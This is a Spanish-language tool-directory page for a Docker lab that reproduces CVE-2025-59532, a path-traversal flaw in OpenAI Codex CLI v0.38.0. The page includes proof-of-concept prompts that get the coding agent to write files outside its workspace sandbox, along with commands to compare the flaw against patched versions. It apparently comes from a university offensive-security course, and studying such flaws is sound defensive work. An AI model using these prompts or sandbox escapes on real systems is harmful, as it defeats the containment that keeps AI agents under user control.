Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-59532-poc — Un entorno de investigación basado en Docker para analizar CVE-2025-59532, una vulnerabilidad de path traversal en OpenAI Codex CLI que permite la escritura arbitraria de archivos fuera del sandbox de workspace previsto. Parte del curso de CMU : 18-739 Hacking & Offensive Security en Otoño 2025. | Kitploit
Herramientas/GitHubGitHub/baktistr/cve-2025-59532-poc
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

GitHub
baktistr/cve-2025-59532-poc

cve-2025-59532-poc

Ver Repositorio
1hace 7 mesesAún no revisado

Un entorno de investigación basado en Docker para analizar CVE-2025-59532, una vulnerabilidad de path traversal en OpenAI Codex CLI que permite la escritura arbitraria de archivos fuera del sandbox de workspace previsto. Parte del curso de CMU : 18-739 Hacking & Offensive Security en Otoño 2025.

Compartir

Entorno Docker para CVE-2025-59532

Un entorno de investigación basado en Docker para analizar CVE-2025-59532, una vulnerabilidad de path traversal en OpenAI Codex CLI que permite escribir archivos arbitrarios fuera del sandbox del espacio de trabajo previsto. Parte del curso de CMU: 18-739 Hacking & Offensive Security en otoño de 2025

Comenzando

Clonar el repositorio

Primero, clona este repositorio:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

O si usas SSH:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

Descripción de la CVE

CVE-2025-59532 es una vulnerabilidad de path traversal en la herramienta Codex CLI de OpenAI que permite a los atacantes escribir archivos fuera del directorio de trabajo previsto, evadiendo las restricciones del sandbox.

Detalles de la vulnerabilidad

  • ID de CVE: CVE-2025-59532
  • Versión afectada: Codex CLI v0.38.0 y anteriores
  • Tipo de vulnerabilidad: Escritura arbitraria de archivos / Path Traversal
  • Gravedad: Alta
  • Vector de ataque: Un atacante puede crear prompts que hagan que Codex escriba archivos en directorios padre (p. ej., ../exploit.txt), escapando del sandbox del espacio de trabajo incluso cuando --sandbox workspace-write está habilitado.
  • Impacto: Creación no autorizada de archivos en directorios del sistema, potencial escalada de privilegios y compromiso de los límites de seguridad del contenedor.
  • Parche: Corregido en v0.39.0 con una mejor validación y sanitización de rutas

Cómo funciona

La vulnerabilidad explota una validación insuficiente de rutas en la implementación del sandbox del espacio de trabajo. Cuando el modo sandbox workspace-write está habilitado, Codex debería restringir las operaciones de archivos al directorio de trabajo designado. Sin embargo, en v0.38.0, la validación de rutas no maneja correctamente las secuencias de path traversal relativas (../), lo que permite a un atacante escribir archivos fuera del sandbox indicándole a la IA que use referencias al directorio padre.

Requisitos previos

  • Docker instalado en tu sistema
  • Clave de API de OpenAI (obtén una en https://platform.openai.com/api-keys)
  • Conocimientos básicos de Docker y operaciones de línea de comandos
  • Git (para clonar el repositorio)

Compilar y ejecutar

Compilar la imagen de Docker:

root@kitploit:~
docker build -t cve-2025-59532:latest .

Ejecutar el contenedor:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

Uso

Este entorno Docker incluye tres versiones de Codex CLI:

  • codex38 - v0.38.0 (versión vulnerable)
  • codex39 - v0.39.0 (versión parcheada)
  • codex50 - v0.50.0 (versión más reciente)

Configurar la clave de API de OpenAI

Una vez dentro del contenedor, configura tu clave de API de OpenAI simplemente ejecutando codex en modo interactivo y pegando allí la clave de API:

root@kitploit:~
codex

La clave de API se almacenará en ~/.config/codex/auth.json y será utilizada por todas las versiones de Codex (codex38, codex39, codex50).

Verificar versiones

root@kitploit:~
codex38 --version  # Should show v0.38.0 (vulnerable)
codex39 --version  # Should show v0.39.0 (patched)
codex50 --version  # Should show v0.50.0 (latest)

Probando la vulnerabilidad

Nota: El espacio de trabajo se encuentra en /workspace/child. La vulnerabilidad permite escribir en /workspace (el directorio padre).

Probar la versión vulnerable (v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Probar la versión parcheada (v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Probar la versión más reciente (v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Verificar el exploit:

root@kitploit:~
# Check if files were created outside the sandbox (in /workspace, not /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Should exist if v0.38.0 is vulnerable
cat /workspace/exploit_proof2.txt  # Should NOT exist if v0.39.0 is patched
cat /workspace/exploit_proof3.txt  # Should NOT exist if v0.50.0 is secure

# Check current workspace (should be empty or contain only test files)
pwd  # Should show /workspace/child
ls -la /workspace/child/

Revisar registros

Para ver registros de depuración detallados de la ejecución de Codex:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Los registros de depuración mostrarán:

  • Peticiones y respuestas de la API
  • Intentos de validación de rutas
  • Detalles de las operaciones de archivos
  • Comportamiento de la aplicación (o evasión) del sandbox
Descargar herramienta